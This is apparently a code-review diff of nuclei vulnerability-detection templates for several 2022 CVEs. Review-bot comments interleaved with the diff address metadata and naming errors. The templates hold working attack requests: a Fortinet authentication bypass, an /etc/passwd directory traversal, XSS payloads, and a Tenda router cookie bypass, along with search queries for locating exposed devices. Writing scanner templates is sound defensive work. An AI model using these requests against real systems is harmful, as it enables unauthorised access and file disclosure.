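Review bot: the description `Free5gc v3.2.1 is vulnerable to Information disclosure.` does not say what is disclosed, and the name carries no version; the request fetches `/api/subscriber` from the web console with a static `Token: admin` header and matches on `plmnID`/`ueId` fields, so state that the free5GC 3.2.1 web console API returns subscriber records without proper authentication, and name it `free5GC 3.2.1 - Information Disclosure` like the other templates here. The `metadata` block also lacks the `verified` entry the other new templates carry.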

@ -1,13 +1,15 @@
id: CVE-2022-40083
info:
name: Labstack Echo < v4.9.0 - Open Redirect
name: Labstack Echo 4.8.0 - Open Redirect
author: pdteam
severity: critical
description: |
Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF).
Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Download and install 4.9.0, which contains a patch for this issue.
reference:
- https://github.com/labstack/echo/issues/2259
- https://nvd.nist.gov/vuln/detail/CVE-2022-40083
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.6
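Review bot: the name narrows the affected version to exactly `4.8.0` while the added remediation says to install 4.9.0, which implies every release before 4.9.0 is affected; the previous `< v4.9.0` range was the more informative one, so confirm the affected range against the linked issue before narrowing the title.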
@ -30,3 +32,5 @@ requests:
- type: status
status:
- 301
# Enhanced by md on 2022/10/18

@ -1,19 +1,22 @@
id: CVE-2022-40684
info:
name: Fortigate - Authentication bypass
name: Fortinet - Authentication Bypass
author: Shockwave,nagli,carlosvieira
severity: critical
description: |
Enables an unauthenticated remote attacker to use administrative interfaces by sending specially crafted HTTP or HTTPS requests, allowing them to log in to various products of Fortinet that are unpatched.
Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
- https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
- https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
- https://nvd.nist.gov/vuln/detail/CVE-2022-40684
classification:
cvss-score: 9.6
cve-id: CVE-2022-27593
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40684
cwe-id: CWE-306
tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev
requests:
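Review bot: the new name `Fortinet - Authentication Bypass` is vaguer than the old `Fortigate - ...`; the description lists FortiOS, FortiProxy and FortiSwitchManager with version ranges, so something like `Fortinet FortiOS/FortiProxy/FortiSwitchManager - Authentication Bypass` keeps the product visible in scan output. The `cve-id` correction (it previously pointed at CVE-2022-27593) and the score change to 9.8 match the new `cvss-metrics` and should stay.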
@ -33,8 +36,8 @@ requests:
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 610
{
"ssh-public-key1":"{{randstr}}"
{
"ssh-public-key1":"{{randstr}}"
}
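Review bot: `Content-Length: 610` is hard-coded while the body is `{"ssh-public-key1":"{{randstr}}"}`, whose length depends on the generated value; unless the engine recomputes Content-Length for raw requests, the mismatch makes the server wait for more bytes or truncate the body. Either drop the header so it is computed, or add a comment confirming that nuclei overrides it. The re-indentation of the JSON body itself is fine.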
stop-at-first-match: true
@ -54,3 +57,5 @@ requests:
- 'Invalid SSH public key.'
- 'cli_error'
condition: and
# Enhanced by md on 2022/10/19

@ -0,0 +1,43 @@
id: CVE-2022-40879
info:
name: kkFileView 4.1.0 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the parameter 'errorMsg.'
reference:
- https://github.com/kekingcn/kkFileView/issues/389
- https://nvd.nist.gov/vuln/detail/CVE-2022-40879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-29349
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.html:"kkFileView"
tags: cve,cve2022,kkFileView,xss
requests:
- method: GET
path:
- "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=1 onerror=alert(document.domain)>=PQ</p>'
- '该文件不'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
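Review bot: `cve-id: CVE-2022-29349` does not match the template `id: CVE-2022-40879` or the NVD reference; it looks copied from another template and should be `CVE-2022-40879`. `verified: true` is also unquoted here while the other new templates in this commit quote the value.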

@ -0,0 +1,45 @@
id: CVE-2022-41473
info:
name: RPCMS 3.0.2 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/ralap-z/rpcms/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2022-41473
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-41473
cwe-id: CWE-79
metadata:
shodan-query: http.html:"RPCMS"
verified: "true"
tags: cve,cve2022,rpcms,xss
requests:
- method: GET
path:
- "{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'rpcms'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by md on 2022/10/18

@ -0,0 +1,36 @@
id: CVE-2022-41840
info:
name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal
author: theamanrawat
severity: high
reference:
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
- https://wordpress.org/plugins/usc-e-shop/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
classification:
cve-id: CVE-2022-41840
metadata:
verified: true
tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
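Review bot: this template has no `description`, and its `classification` carries only `cve-id` (no `cvss-metrics`, `cvss-score` or `cwe-id`), unlike every other template in this commit; add a description (based on the request, `progress-check.php` returns the file named by the `progressfile` parameter without restricting the path) and fill in the classification, CWE-22 for traversal, or note why the scores are unavailable. `verified: true` is unquoted here as well.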

@ -0,0 +1,47 @@
id: CVE-2022-42233
info:
name: Tenda 11N - Authentication Bypass
author: For3stCo1d
severity: critical
description: |
Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability.
reference:
- https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-42233
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-42233
cwe-id: CWE-287
metadata:
fofa-query: product=="Tenda-11N-Wireless-AP"
shodan-query: http.title:"Tenda 11N"
verified: "true"
tags: cve,cve2022,tenda,auth-bypass,router,iot
requests:
- raw:
- |
GET /index.asp HTTP/1.1
Host: {{Hostname}}
Cookie: admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'def_wirelesspassword'
- 'Tenda 11N'
condition: and
case-insensitive: true
- type: word
part: header
words:
- 'GoAhead-Webs'
- type: status
status:
- 200
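Review bot: the description only says the device `suffers from an Authentication Bypass vulnerability`; the request shows the mechanism (a `Cookie: admin` header on `/index.asp` yields the administrative page), so state that in the description, and carry the affected firmware `V5.07.33_cn` in the name as the other templates in this commit do with their versions.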
